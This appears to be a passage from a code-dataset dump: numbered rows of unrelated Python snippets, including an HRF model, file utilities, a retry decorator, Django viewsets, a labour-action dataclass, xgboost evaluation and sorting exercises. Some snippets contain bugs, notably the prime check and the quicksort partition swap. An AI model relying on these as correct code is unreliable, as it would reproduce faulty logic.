'ks': 300,
'kt': 192,
'ku': 1013,
'kv': 116,
'kw': 230,
'kx': 88,
'ky': 444,
'kz': 90,
'l-': 45,
'l0': 12,
'l1': 8,
'l2': 60,
'l3': 18,
'l4': 6,
'l5': 2,
'l6': 2,
'l7': 14,
'l8': 5,
'l9': 3,
'la': 14155,
'lb': 350,
'lc': 258,
'ld': 192,
'le': 13390,
'lf': 172,
'lg': 196,
'lh': 179,
'li': 13775,
'lj': 185,
'lk': 82,
'll': 276,
'lm': 185,
'ln': 163,
'lo': 17441,
'lp': 192,
'lq': 75,
'lr': 137,
'ls': 265,
'lt': 197,
'lu': 2947,
'lv': 210,
'lw': 133,
'lx': 124,
'ly': 761,
'lz': 136,
'm-': 162,
'm0': 11,
'm1': 26,
'm2': 47,
'm3': 32,
'm4': 31,
'm5': 8,
'm6': 7,
'm7': 6,
'm8': 11,
'm9': 4,
'ma': 21517,
'mb': 321,
'mc': 856,
'md': 322,
'me': 12983,
'mf': 160,
'mg': 199,
'mh': 180,
'mi': 10847,
'mj': 190,
'mk': 192,
'ml': 403,
'mm': 572,
'mn': 242,
'mo': 11994,
'mp': 473,
'mq': 80,
'mr': 773,
'ms': 631,
'mt': 424,
'mu': 3947,
'mv': 212,
'mw': 145,
'mx': 138,
'my': 8975,
'mz': 124,
'n-': 85,
'n0': 16,
'n1': 16,
'n2': 209,
'n3': 6,
'n4': 10,
'n5': 3,
'n6': 4,
'n7': 6,
'n8': 14,
'n9': 2,
'na': 5028,
'nb': 379,
'nc': 347,
'nd': 186,
'ne': 10656,
'nf': 213,
'ng': 232,
'nh': 270,
'ni': 3672,
'nj': 370,
'nk': 136,
'nl': 174,
'nm': 214,
'nn': 176,
'no': 10377,
'np': 174,
'nq': 65,
'nr': 161,
'ns': 248,
'nt': 270,
'nu': 1902,
'nv': 175,
'nw': 247,
'nx': 119,
'ny': 630,
'nz': 150,
'o-': 95,
'o0': 2,
'o1': 5,
'o2': 28,
'o3': 13,
'o4': 2,
'o5': 5,
'o6': 2,
'o7': 2,
'o8': 4,
'o9': 1,
'oa': 322,
'ob': 1267,
'oc': 959,
'od': 2152,
'oe': 162,
'of': 3428,
'og': 208,
'oh': 1587,
'oi': 1494,
'oj': 147,
'ok': 724,
'ol': 2309,
'om': 1532,
'on': 7256,
'oo': 234,
'op': 1673,
'oq': 58,
'or': 3282,
'os': 555,
'ot': 634,
'ou': 4435,
'ov': 944,
'ow': 4377,
'ox': 218,
'oy': 187,
'oz': 441,
'p-': 86,
'p0': 12,
'p1': 19,
'p2': 43,
'p3': 24,
'p4': 15,
'p5': 8,
'p6': 2,
'p7': 2,
'p8': 5,
'p9': 5,
'pa': 15758,
'pb': 196,
'pc': 606,
'pd': 263,
'pe': 6763,
'pf': 189,
'pg': 207,
'ph': 2496,
'pi': 7203,
'pj': 148,
'pk': 162,
'pl': 7080,
'pm': 258,
'pn': 171,
'po': 11038,
'pp': 369,
'pq': 91,
'pr': 7474,
'ps': 686,
'pt': 286,
'pu': 6557,
'pv': 156,
'pw': 142,
'px': 98,
'py': 246,
'pz': 114,
'q-': 38,
'q0': 3,
'q1': 8,
'q2': 8,
'q3': 6,
'q4': 4,
'q5': 3,
'q6': 3,
'q8': 44,
'q9': 4,
'qa': 220,
'qb': 92,
'qc': 118,
'qd': 194,
'qe': 117,
'qf': 81,
'qg': 84,
'qh': 109,
'qi': 391,
'qj': 79,
'qk': 73,
'ql': 125,
'qm': 82,
'qn': 92,
'qo': 114,
'qp': 102,
'qq': 248,
'qr': 83,
'qs': 131,
'qt': 89,
'qu': 3434,
'qv': 65,
'qw': 148,
'qx': 97,
'qy': 109,
'qz': 152,
'r-': 89,
'r0': 7,
'r1': 10,
'r2': 26,
'r3': 20,
'r4': 17,
'r5': 2,
'r6': 2,
'r7': 10,
'r8': 1,
'r9': 4,
'ra': 9842,
'rb': 211,
'rc': 334,
'rd': 204,
're': 13653,
'rf': 215,
'rg': 139,
'rh': 365,
'ri': 7079,
'rj': 156,
'rk': 119,
'rl': 150,
'rm': 254,
'rn': 173,
'ro': 9275,
'rp': 216,
'rq': 46,
'rr': 143,
'rs': 333,
'rt': 270,
'ru': 4797,
'rv': 182,
'rw': 142,
'rx': 199,
'ry': 348,
'rz': 102,
's-': 122,
's0': 6,
's1': 26,
's2': 33,
's3': 27,
's4': 19,
's5': 10,
's6': 12,
's7': 19,
's8': 12,
's9': 6,
'sa': 17038,
'sb': 328,
'sc': 3980,
'sd': 603,
'se': 18133,
'sf': 356,
'sg': 309,
'sh': 12388,
'si': 10761,
'sj': 286,
'sk': 1551,
'sl': 2639,
'sm': 2210,
'sn': 818,
'so': 11313,
'sp': 6560,
'sq': 323,
'sr': 385,
'ss': 497,
'st': 11992,
'su': 9496,
'sv': 251,
'sw': 1490,
'sx': 289,
'sy': 1044,
'sz': 702,
't-': 149,
't0': 4,
't1': 14,
't2': 16,
't3': 20,
't4': 8,
't5': 8,
't6': 6,
't7': 9,
't8': 34,
't9': 12,
'ta': 10163,
'tb': 227,
'tc': 353,
'td': 239,
'te': 12576,
'tf': 165,
'tg': 186,
'th': 20347,
'ti': 8367,
'tj': 321,
'tk': 178,
'tl': 273,
'tm': 289,
'tn': 269,
'to': 11512,
'tp': 227,
'tq': 90,
'tr': 12301,
'ts': 469,
'tt': 280,
'tu': 3572,
'tv': 534,
'tw': 2193,
'tx': 266,
'ty': 1588,
'tz': 175,
'u-': 119,
'u0': 3,
'u1': 15,
'u2': 21,
'u3': 9,
'u4': 3,
'u5': 3,
'u6': 3,
'u7': 2,
'u8': 11,
'u9': 5,
'ua': 258,
'ub': 352,
'uc': 350,
'ud': 179,
'ue': 138,
'uf': 188,
'ug': 891,
'uh': 194,
'ui': 127,
'uj': 66,
'uk': 422,
'ul': 536,
'um': 326,
'un': 3354,
'uo': 106,
'up': 2718,
'uq': 59,
'ur': 923,
'us': 6826,
'ut': 474,
'uu': 108,
'uv': 172,
'uw': 165,
'ux': 93,
'uy': 107,
'uz': 97,
'v-': 87,
'v0': 3,
'v1': 8,
'v2': 11,
'v3': 20,
'v4': 8,
'v5': 4,
'v6': 14,
'v7': 2,
'v8': 9,
'v9': 2,
'va': 5048,
'vb': 168,
'vc': 200,
'vd': 140,
've': 2797,
'vf': 111,
'vg': 120,
'vh': 121,
'vi': 8878,
'vj': 91,
'vk': 117,
'vl': 172,
'vm': 152,
'vn': 149,
'vo': 2303,
'vp': 172,
'vq': 76,
'vr': 232,
'vs': 192,
'vt': 174,
'vu': 214,
'vv': 139,
'vw': 105,
'vx': 101,
'vy': 119,
'vz': 97,
'w-': 49,
'w0': 9,
'w1': 15,
'w2': 10,
'w3': 49,
'w4': 11,
'w5': 5,
'w6': 2,
'w7': 5,
'w8': 16,
'w9': 7,
'wa': 13399,
'wb': 160,
'wc': 178,
'wd': 138,
'we': 10270,
'wf': 145,
'wg': 135,
'wh': 7676,
'wi': 8165,
'wj': 154,
'wk': 103,
'wl': 169,
'wm': 219,
'wn': 137,
'wo': 4635,
'wp': 199,
'wq': 78,
'wr': 578,
'ws': 246,
'wt': 170,
'wu': 306,
'wv': 136,
'ww': 2494,
'wx': 193,
'wy': 274,
'wz': 183,
'x-': 157,
'x0': 8,
'x1': 15,
'x2': 61,
'x3': 15,
'x4': 2,
'x5': 8,
'x6': 12,
'x7': 3,
'x8': 5,
'x9': 3,
'xa': 329,
'xb': 191,
'xc': 220,
'xd': 145,
'xe': 282,
'xf': 158,
'xg': 136,
'xh': 144,
'xi': 794,
'xj': 208,
'xk': 79,
'xl': 180,
'xm': 285,
'xn': 107,
'xo': 163,
'xp': 292,
'xq': 82,
'xr': 126,
'xs': 195,
'xt': 344,
'xu': 208,
'xv': 78,
'xw': 84,
'xx': 552,
'xy': 237,
'xz': 171,
'y-': 45,
'y0': 5,
'y1': 6,
'y2': 13,
'y3': 2,
'y5': 5,
'y6': 4,
'y7': 4,
'y8': 3,
'y9': 4,
'ya': 1485,
'yb': 102,
'yc': 195,
'yd': 137,
'ye': 2320,
'yf': 106,
'yg': 116,
'yh': 159,
'yi': 568,
'yj': 136,
'yk': 131,
'yl': 168,
'ym': 174,
'yn': 217,
'yo': 4580,
'yp': 214,
'yq': 89,
'yr': 98,
'ys': 233,
'yt': 248,
'yu': 779,
'yv': 101,
'yw': 155,
'yx': 142,
'yy': 176,
'yz': 169,
'z-': 40,
'z0': 4,
'z1': 6,
'z2': 6,
'z3': 5,
'z4': 1,
'z5': 4,
'z7': 2,
'z8': 1,
'z9': 3,
'za': 920,
'zb': 144,
'zc': 129,
'zd': 141,
'ze': 1083,
'zf': 95,
'zg': 277,
'zh': 651,
'zi': 676,
'zj': 315,
'zk': 102,
'zl': 176,
'zm': 120,
'zn': 117,
'zo': 741,
'zp': 107,
'zq': 131,
'zr': 148,
'zs': 167,
'zt': 102,
'zu': 336,
'zv': 70,
'zw': 126,
'zx': 108,
'zy': 171,
'zz': 266,
}
|
4,340 | 596ee5568a32c3044e797375fbc705e2091f35c2 | from functools import partial
import numpy as np
import scipy.stats as sps
# SPMs HRF
def spm_hrf_compat(t,
peak_delay=6,
under_delay=16,
peak_disp=1,
under_disp=1,
p_u_ratio = 6,
normalize=True,
):
""" SPM HRF function from sum of two gamma PDFs
This function is designed to be partially compatible with SPMs `spm_hrf.m`
function.
The SPN HRF is a *peak* gamma PDF (with location `peak_delay` and dispersion
`peak_disp`), minus an *undershoot* gamma PDF (with location `under_delay`
and dispersion `under_disp`, and divided by the `p_u_ratio`).
Parameters
----------
t : array-like
vector of times at which to sample HRF
peak_delay : float, optional
delay of peak
peak_disp : float, optional
width (dispersion) of peak
under_delay : float, optional
delay of undershoot
under_disp : float, optional
width (dispersion) of undershoot
p_u_ratio : float, optional
peak to undershoot ratio. Undershoot divided by this value before
subtracting from peak.
normalize : {True, False}, optional
If True, divide HRF values by their sum before returning. SPM does this
by default.
Returns
-------
hrf : array
vector length ``len(t)`` of samples from HRF at times `t`
Notes
-----
See ``spm_hrf.m`` in the SPM distribution.
"""
if len([v for v in [peak_delay, peak_disp, under_delay, under_disp]
if v <= 0]):
raise ValueError("delays and dispersions must be > 0")
# gamma.pdf only defined for t > 0
hrf = np.zeros(t.shape, dtype=np.float)
pos_t = t[t > 0]
peak = sps.gamma.pdf(pos_t,
peak_delay / peak_disp,
loc=0,
scale=peak_disp)
undershoot = sps.gamma.pdf(pos_t,
under_delay / under_disp,
loc=0,
scale=under_disp)
hrf[t > 0] = peak - undershoot / p_u_ratio
if not normalize:
return hrf
return hrf / np.max(hrf)
def _get_num_int(lf, dt=0.02, t=50):
# numerical integral of numerical function
tt = np.arange(dt,t+dt,dt)
return lf(tt).sum() * dt
_spm_can_int = _get_num_int(partial(spm_hrf_compat, normalize=True))
def spmt(t):
""" SPM canonical HRF, HRF values for time values `t`
This is the canonical HRF function as used in SPM. It
has the following defaults:
defaults
(seconds)
delay of response (relative to onset) 6
delay of undershoot (relative to onset) 16
dispersion of response 1
dispersion of undershoot 1
ratio of response to undershoot 6
onset (seconds) 0
length of kernel (seconds) 32
"""
return spm_hrf_compat(t, normalize=True)
def dspmt(t):
""" SPM canonical HRF derivative, HRF derivative values for time values `t`
This is the canonical HRF derivative function as used in SPM.
It is the numerical difference of the HRF sampled at time `t` minus the
values sampled at time `t` -1
"""
t = np.asarray(t)
return spmt(t) - spmt(t - 1)
_spm_dd_func = partial(spm_hrf_compat, normalize=True, peak_disp=1.01)
def ddspmt(t):
""" SPM canonical HRF dispersion derivative, values for time values `t`
This is the canonical HRF dispersion derivative function as used in SPM.
It is the numerical difference between the HRF sampled at time `t`, and
values at `t` for another HRF shape with a small change in the peak
dispersion parameter (``peak_disp`` in func:`spm_hrf_compat`).
"""
return (spmt(t) - _spm_dd_func(t)) / 0.01 |
4,341 | 3788888a17e2598e781803f89cd63ac9c3219f59 | import os
import json
def load_json_if_exists(path):
if not os.path.isfile(path):
return {}
with open(path) as f:
return json.load(f)
def json_dump(obj, file_path):
with open(file_path, 'w') as f:
json.dump(obj, f)
def get_folder_paths(directory):
return [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isdir(os.path.join(directory, f))]
def file_to_lines(file_path):
if len(file_path) == 0:
return []
with open(file_path) as f:
lines = list(f.read().splitlines())
return lines
def get_repo_path(file_path):
if os.path.isfile(file_path):
folder_path = os.path.abspath(os.path.join(file_path, os.pardir))
else:
folder_path = file_path
for i in range(100):
if folder_path == '/':
return None
if is_repo_path(folder_path):
break
folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))
return folder_path
def is_repo_path(path):
return os.path.isdir(path) and '.git' in os.listdir(path)
class LineNumberTracker:
'''
When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,
'''
def __init__(self):
self._log = []
def transform(self, line_num):
for is_add, start, end in self._log:
if line_num < start:
pass
elif line_num < end and not is_add:
assert False, 'Line Deleted: {} {}'.format(line_num, self._log)
else:
if is_add:
line_num += (end - start)
else:
line_num -= (end - start)
return line_num
def remove_lines(self, start, end):
self._log.append((False, start, end))
def add_lines(self, start, end):
self._log.append((True, start, end))
|
4,342 | 59ddb85d55c342342be4edc1fc3b92af701fa6cc | import BST
tree = BST.BST(10)
tree.insert(5, tree.root)
tree.insert(15, tree.root)
tree.insert(25, tree.root)
tree.insert(12, tree.root)
tree.insert(35, tree.root)
print(tree.height(tree.root)) |
4,343 | d46035699bee1ad9a75ea251c2c3ab8817d6a740 | # Import packages
import pandas
import requests
import lxml
# Get page content
url = "https://archive.fantasysports.yahoo.com/nfl/2017/189499?lhst=sched#lhstsched"
html = requests.get(url).content
df_list = pandas.read_html(html)
# Pull relevant URLs
|
4,344 | 79e4592d5ea84cc7c97d68a9390eb5d387045cf0 | from functools import wraps
from time import sleep
def retry(retry_count = 2, delay = 5, action_description = 'not specified', allowed_exceptions=()):
def decorator(func):
@wraps(func) # to preserve metadata of the function to be decorated
def wrapper(*args, **kwargs):
for _ in range(retry_count):
try:
return func(*args, **kwargs)
except allowed_exceptions as e:
print('Error executing {}: {}'.format(func.__name__, e))
print('Waiting for {} sec before executing {} again'.format(delay, func.__name__))
sleep(delay)
print('Retrying to execute ' + func.__name__ + ' (action: ' + action_description + ')')
return wrapper
return decorator |
4,345 | 4d0f612c74dc175766f489580fc4a492e1bfd085 | import pandas as pd
import math
import json
import html
import bs4
import re
import dateparser
from bs4 import BeautifulSoup
from dataclasses import dataclass, field
from datetime import datetime
from typing import Any, List, Dict, ClassVar, Union
from urllib.parse import urlparse
from .markdown import MarkdownData, MarkdownDocument
Url = str
@dataclass
class Action:
""" The class for an action we want to track.
This class is used to manage the data of an individual Action. It is used
to perform the following:
- set mandatory/optional fields
- set meta fields
- cast an validate data so that it knows how to read datafields from
markdown and dataframes
- output actions as for dataframes and markdown
- create and populate action instances from markdown and dataframes
"""
date: str
sources: List[Url]
action: str
struggles: List[str]
description: str
locations: List[str] = None
companies: List[str] = None
workers: int = None
tags: List[str] = None
author: str = None
_meta_fields: ClassVar = ["author"]
_valid_struggles: ClassVar = [
"ethics",
"pay_and_benefits",
"working_conditions",
"discrimination",
"unfair_labor_practices",
"job_security",
]
_valid_actions: ClassVar = [
"strike",
"protest",
"open_letter",
"legal_action",
"union_drive",
"union_representation",
]
@staticmethod
def is_none(field: Any) -> bool:
if field is None:
return True
elif isinstance(field, float) and math.isnan(field):
return True
elif isinstance(field, str) and field.lower() == "none":
return True
elif isinstance(field, (list,)) and len(field) == 0:
return True
else:
return False
def listify(self, field: Union[List[Any], Any]) -> List[Any]:
if self.is_none(field):
return None
else:
if isinstance(field, (list,)):
return field
else:
return [s.strip().lower() for s in field.split(",")]
def __post_init__(self):
""" Used to validate fields. """
# self.date = datetime.strptime(self.date, "%Y-%m-%d").date()
self.date = dateparser.parse(self.date).date()
self.sources = self.listify(self.sources)
self.struggles = self.listify(self.struggles)
self.action = self.action.strip().lower()
self.companies = self.listify(self.companies)
self.tags = self.listify(self.tags)
self.locations = self.listify(self.locations)
self.workers = None if self.is_none(self.workers) else int(self.workers)
# make sure action is a valid action
assert (
self.action in self._valid_actions
), f"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}"
# make sure all struggles are valid struggles
for struggle in self.struggles:
assert (
struggle in self._valid_struggles
), f"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}"
# make sure source is either a url or a html link tag <a>
for source in self.sources:
assert (
BeautifulSoup(source, "html.parser").a is not None
or urlparse(source).netloc is not ""
), f"'{source}' is in valid. source must be a valid url or an html link tag element"
# if html, extract only href from sources
self.sources = [
BeautifulSoup(source, "html.parser").a["href"]
if "href" in source
else source
for source in self.sources
]
def __lt__(self, other):
""" Used to make Actions sortable. """
return self.date < other.date
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Action):
return self.__dict__.items() == other.__dict__.items()
return False
def to_df(self) -> Dict[str, Any]:
""" Return dict of all fields serialized to string """
return {key: self.render_df(key) for key, value in self.__dict__.items()}
def render_df(self, field: str) -> str:
""" Return the value of the field rendered for df. """
value = self.__getattribute__(field)
if field in ["date", "workers"]:
return str(value)
elif field in ["locations", "struggles", "companies", "tags", "sources"]:
return str(value).strip("[").strip("]").replace("'", "").replace('"', "")
else:
return value
def to_md(self, field: str, td: bs4.element.Tag) -> str:
""" Convert field for markdown
Takes a td BeautifulSoup object and updates it according to the field
type so that it renders correctly in markdown.
"""
assert (
field in self.__dataclass_fields__
), f"Cannot serialize {field}. Not a valid field in Action."
value = self.__getattribute__(field)
if field in ["date", "workers"]:
td.string = str(value)
elif field in ["locations", "struggles", "companies", "tags"]:
td.string = (
str(value).strip("[").strip("]").replace("'", "").replace('"', "")
)
elif field == "sources":
ret = []
for source in value:
tag = (
f"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>"
)
ret.append(tag)
td.append(BeautifulSoup(html.unescape(", ".join(ret)), "html.parser"))
else:
td.string = value
return td
@classmethod
def create_from_md(cls, table: bs4.element.Tag) -> "Action":
""" Create an Action instance from a md table. """
a = {}
trs = table.find_all("tr")
for key, val in table.attrs.items():
if key != "class":
a[key] = val
for i, tr in enumerate(trs):
td_key = tr.find("td", class_="field-key")
td_val = tr.find("td", class_="field-value")
val = "".join(str(e) for e in td_val.contents).strip()
key = "".join(str(e) for e in td_key.contents).strip()
a[key] = val
return cls(**a)
@classmethod
def create_from_row(cls, row: pd.Series) -> "Action":
""" Create an Action instance from a dataframe row. """
fields = [
key
for key, value in cls.__dataclass_fields__.items()
if value.type != ClassVar
]
d = {key: value for key, value in row.to_dict().items() if key in fields}
return cls(**d)
@dataclass
class Actions:
""" The class for a set of actions.
This class is a collection of actions. It is used to for the four primary
usecases:
- to serialize the list of actions into a dataframe
- to serialize the list of actions into a markdown/html table
- to create and populate an Actions instance from a dataframe
- to create and populate an Actions instance from a markdown document
"""
action_id: ClassVar = "actions"
actions: List[Action] = field(default_factory=lambda: [])
fields: List[str] = field(
default_factory=lambda: [
key
for key, value in Action.__dataclass_fields__.items()
if value.type != ClassVar
]
)
def __len__(self) -> int:
""" Get the number of actions. """
return len(self.actions)
def __eq__(self, other):
""" Overrides the default implementation for equality. """
if isinstance(other, Actions):
return self.actions == other.actions
return False
def sort(self, *args, **kwargs) -> "Actions":
""" Sorts the list of actions. """
self.actions.sort(*args, **kwargs)
return self
def append(self, action: Action):
""" Append an action onto this instance of Actions. """
self.actions.append(action)
def to_df(self) -> pd.DataFrame:
""" Converts this instance of Actions to a df. """
data = []
for action in self.actions:
data.append(action.to_df())
df = pd.read_json(json.dumps(data), orient="list")
return df[self.fields]
def to_md(self):
""" Convert this instance of Actions to markdown/HTML. """
soup = BeautifulSoup(f"<div id={self.action_id}></div>", "html.parser")
for action in self.actions:
table = soup.new_tag("table")
soup.div.append(table)
for meta_field in Action._meta_fields:
table[meta_field] = action.__getattribute__(meta_field)
for field in self.fields:
if action.__getattribute__(field) is None:
continue
if field in Action._meta_fields:
continue
tr = soup.new_tag("tr")
td_key = soup.new_tag("td", attrs={"class": "field-key"})
td_val = soup.new_tag("td", attrs={"class": "field-value"})
td_key.string = field
td_val = action.to_md(field, td_val)
tr.append(td_key)
tr.append(td_val)
table.append(tr)
return soup.prettify()
@classmethod
def read_from_md(cls, md_doc: MarkdownDocument) -> "Actions":
""" Create and populate an Actions instance from a Markdown Document. """
md_data = re.findall(fr'<div id="{cls.action_id}">+[\s\S]+<\/div>', md_doc)
assert len(md_data) == 1, f"multiple divs with id={cls.action_id} were found"
md_data = md_data[0]
soup = BeautifulSoup(md_data, "html.parser")
tables = soup.div.find_all("table")
actions = Actions()
for table in tables:
action = Action.create_from_md(table)
actions.append(action)
return actions
@staticmethod
def read_from_df(df: pd.DataFrame) -> "Actions":
""" Create and populate an Actions instance from a dataframe. """
actions = Actions()
for i, row in df.iterrows():
action = Action.create_from_row(row)
actions.append(action)
return actions
|
4,346 | bedae2621bfcc64deb0d13d7cbce3cfb89720245 | from rest_framework import viewsets
from .models import *
from serializer import *
from django.http import HttpResponse
from django.views import View
from django.core import serializers
# Create your views here.
class ProyectoViewSet(viewsets.ModelViewSet):
queryset = Proyecto.objects.all()
serializer_class = ProyectoSerializer
class UsuarioViewSet(viewsets.ModelViewSet):
queryset = Usuario.objects.all()
serializer_class = UsuariosSerializer
class SistemaViewSet(viewsets.ModelViewSet):
queryset = Sistema.objects.all()
serializer_class = SistemaSerializer
class ProyectoSistemaViewSet(viewsets.ModelViewSet):
queryset = ProyectoSistema.objects.all()
serializer_class = ProyectoSistemaSerializer
class UsuarioProyectoSistemaViewSet(viewsets.ModelViewSet):
queryset = UsuarioProyectoSistema.objects.all()
serializer_class = UsuarioProyectoSistemaSerializer
class ProyectoSistemaView(View):
def get(self, request):
data = ProyectoSistema.objects.all()
json = serializers.serialize('json', data)
return HttpResponse(json, content_type='application/json')
|
4,347 | eefd94e7c04896cd6265bbacd624bf7e670be445 | """
Given a sentence as `txt`, return `True` if any two adjacent words have this
property: One word ends with a vowel, while the word immediately after begins
with a vowel (a e i o u).
### Examples
vowel_links("a very large appliance") ➞ True
vowel_links("go to edabit") ➞ True
vowel_links("an open fire") ➞ False
vowel_links("a sudden applause") ➞ False
### Notes
You can expect sentences in only lowercase, with no punctuation.
"""
def vowel_links(txt):
import re
lst=txt.split(' ')
for i in range(len(lst)-1):
if re.search("[aeiou]",lst[i][-1])and re.search("[aeiou]",lst[i+1][0]):
return True
return False
|
4,348 | 9969dcf820a5ff34b483593cd43e4dfba9588ed2 | import sys
from . import cli
def main() -> None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
|
4,349 | c455263b82c04fe2c5cc1e614f10a9962795f87e | """
Utilities for calculations based on antenna positions,
such as baseline and phase factor.
"""
import os
import numpy as np
import pickle
c = 299792458 # m / s
data_prefix = os.path.dirname(os.path.abspath(__file__)) + "/"
try:
ant_pos = dict(pickle.load(open(data_prefix + "ant_dict.pk", "rb")))
def baselength(ant_ID1, ant_ID2):
"""
(Convenience function)
Return the norm of the baseline between antennae
# @ant_ID1 and @ant_ID2
"""
return np.linalg.norm(baseline(ant_ID1, ant_ID2))
def baseline(ant_ID1, ant_ID2):
"""
Calculate the baseline between antennae
# @ant_ID1 and @ant_ID2
by a simple difference of their coordinates.
"""
return ant_pos[ant_ID2] - ant_pos[ant_ID1]
def phase_factor(ant1, ant2, r, nu=151e6):
"""
Calculate the phase factor in the direction @r (l, m)
(we assume that n is of insignificant magnitude)
and at the frequency @nu
between two antennae whose ID #s are @ant1 and @ant2.
When we calculate the baseline (u, v, w), we
assume that w is of insignificant magnitude.
"""
b = baseline(ant1, ant2)[0:2] # kill w
br = np.dot(b, r)
return np.exp(-2j * np.pi * nu * br / c)
except FileNotFoundError:
print("Failure to load antennae data.")
|
4,350 | c0512a90b6a4e50c41d630f6853d1244f78debfb | #dict1 = {"я":"i","люблю":"love","Питон":"Рython"}
#user_input = input("---->")
#print(dict1[user_input])
#list1 =[i for i in range(0,101) if i%7 ==0 if i%5 !=0]
#print(list1)
#stroka = "я обычная строка быть которая должна быть длиннее чем десять символ"
#stroka1=stroka.split()
#dict1={}
#for i in stroka1:
# dict1[i] = stroka.count(i)
#print(dict1)
# #ФУНКЦИИ
##1.
##def foo():
## print("Мой любимый фильм ето ",input())
##foo()
##2.
##import random
##def rand():
## rn = random.randint(0,10)
## return rn
##x=rand()
##print(x)
##list1=[]
##for i in range(0,10):
## list1.append(rand())
##print(list1)
##3.
##def arifm(*x):
## return(sum(x)/len(x))
##print(arifm(1,2,4,5,6))
##4.
##def dict2(x,y):
## return {x:y}
##dict1 = {}
##dict1.update(dict2("GB","London"))
##print(dict1)
##dict5 = {}
##dict5.update(dict2("Hungary","Budapest"))
##print(dict5)
|
4,351 | 37d465043eddd34c4453fd7e31b08d0ba58b725f | #https://www.acmicpc.net/problem/2581
def isPrime(x):
if x==1:
return False
for d in range(1,int(x**0.5)):
if x==d+1:
continue
if x%(d+1)==0:
return False
else:
return True
N=int(input())
M=int(input())
sum=0
min=10001
for x in range(N,M+1):
if isPrime(x):
sum+=x
if min>x:
min=x
if sum==0:
print(-1)
else:
print(sum)
print(min)
|
4,352 | 3cace66ddf8484d285c2b2a8fabbb83778a2c4af | from __future__ import division
import numpy as np
table = open("Tables\\table1.txt", "w")
table.write("\\begin{tabular}{|c|c|c|c|} \\hline\n")
table.write("Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n")
H = [1,5,10,11,12,20,40]
for h in H:
file = open("Out\\out-h"+str(h)+".txt", "r")
line = file.readlines()[-1]
file.close()
line = line.split(",")
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h)+" & "+loss+" & "+acc_tr+" & "+acc_va+" \\\\\n")
table.write("\\hline\n")
table.write("\\end{tabular}")
table.close()
|
4,353 | e2682a5cab95914e7567431cb04c3fb542eda3bf | import numpy as np
import pandas as pd
import xgboost as xgb
from sklearn.metrics import confusion_matrix
USE_MEMMAP = True
data = pd.read_csv( 'dataset.csv' ).as_matrix()
X = data[ :, 0:-1 ]
y = data[ :, -1 ]
if USE_MEMMAP:
Xmm = np.memmap( 'X.mmap', dtype=X.dtype, mode='w+', shape=X.shape )
ymm = np.memmap( 'y.mmap', dtype=y.dtype, mode='w+', shape=y.shape )
np.copyto( Xmm, X )
np.copyto( ymm, y )
del( data )
del( X )
del( y )
X = Xmm
y = ymm
d = xgb.DMatrix( X, label=y )
model = xgb.Booster({'nthread':1})
model.load_model('xgb-model.bin')
cm = confusion_matrix(y, model.predict(d) > 0.5)
print(cm)
|
4,354 | 52513bf3f50726587bee800f118e2ac0fa00d98b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def quick_sort(a):
_quick_sort(a, 0, len(a)-1)
return a
def _quick_sort(a, lo, hi):
if lo < hi:
j = partition2(a, lo, hi)
_quick_sort(a, lo, j-1)
_quick_sort(a, j+1, hi)
def partition(a, lo, hi):
# simply select first element as pivot
# or use sorted(low, midum, high)[1] as pivot,
# and exchange with a[lo]
pivot = a[lo]
border = lo
for i in range(lo, hi + 1):
if a[i] < pivot:
border +=1
a[i], a[border] = a[border], a[i]
a[lo], a[border] = a[border], a[lo]
return border
def partition2(a, lo, hi):
pivot = a[lo]
l = lo
h = hi
while True:
while a[l] < pivot and l < hi:
l += 1
while a[h] > pivot and h > lo:
h -= 1
if l >= h:
break
a[l], a[h] = a[h], a[l]
a[lo], a[l] = a[lo], a[l]
return l
if __name__ == '__main__':
d = [34,2,24,12, 45,33,9,99]
print quick_sort(d)
|
4,355 | f0702c8555ef07aac9e667c35b5b5fd85820ec54 | # from https://web.archive.org/web/20121220025758/http://xkcd.com/actuary.py.txt
# script written by Randall Munroe. Most comments by Emily Cain (although there were a few brief ones explaining how the program worked before I looked at it)
# Summary of program (by Emily):
# this program takes inputs of current ages and genders to calculate the probability any or all of those people will die in a certain time period.
# if you input a year (after the current year) or a number of years (less than the current year) the program will calculate the probability that anyone or everyone will die in that time period. Either way, the program also determines the number of years for certain probabilities of anyone or everyone dying.
# The program outputs these calculations in an easily readable form.
#!/usr/bin/python
import sys
import datetime
# The following description was written by Randall (the programmer).
# Calculates death probabilities based on Social Security
# actuarial tables for a given group of people.
# Run with a list of ages/genders and an optional timespan (or year in the future):
# python actuary.py 63m 80m 75f 73m 10
# or:
# python actuary.py 63m 80m 75f 73m 2022
# This will give statistics for that group, including
# various probabilities over 10 years. Years can be
# ommitted and it will still give some statistics.
# If "Years" exceeds the current calendar year, it will be interpreted as a date.
#this is a list of lists. The outer list contains two inner lists, each of which is an actuarial table--one for men and one for women
